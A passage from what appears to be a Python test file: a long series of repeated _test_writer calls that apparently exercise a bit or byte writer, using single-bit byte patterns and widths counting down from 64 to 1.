_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 36, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 35, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 34, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 33, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 64, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 63, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 62, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 61, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 60, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 59, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 58, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 57, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 56, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 55, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 54, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 53, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 52, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 51, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 50, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 49, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 48, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 47, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 46, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 45, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 44, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 43, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 42, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 41, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 40, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 39, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 38, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 37, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 36, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 35, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 34, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 33, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 64, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 63, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 62, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 61, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 60, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 59, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 58, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 57, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 56, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 55, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 54, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 53, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 52, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 51, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 50, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 49, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 48, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 47, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 46, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 45, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 44, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 43, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 42, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 41, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 40, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 39, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 38, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 37, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 36, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 35, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 34, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 33, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 64, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 63, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 62, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 61, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 60, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 59, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 58, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 57, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 56, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 55, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 54, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 53, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 52, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 51, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 50, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 49, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 48, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 47, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 46, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 45, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 44, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 43, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 42, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 41, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 40, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 39, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 38, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 37, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 36, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 35, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 34, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 33, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
